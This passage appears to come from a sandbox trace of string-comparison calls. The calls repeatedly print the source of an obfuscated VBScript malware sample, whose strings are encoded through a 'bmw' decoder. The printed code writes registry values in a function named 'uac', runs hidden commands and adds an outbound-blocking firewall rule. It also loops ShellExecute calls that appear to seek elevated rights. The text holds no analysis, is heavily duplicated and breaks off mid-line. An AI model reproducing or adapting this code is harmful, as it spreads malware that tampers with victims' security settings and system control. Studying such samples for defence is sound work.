bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.032] wcsncmp (_String1="CP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.032] wcsncmp (_String1="P\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0223.032] wcsncmp (_String1="\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.032] wcsncmp (_String1="\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.032] wcsncmp (_String1="newRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 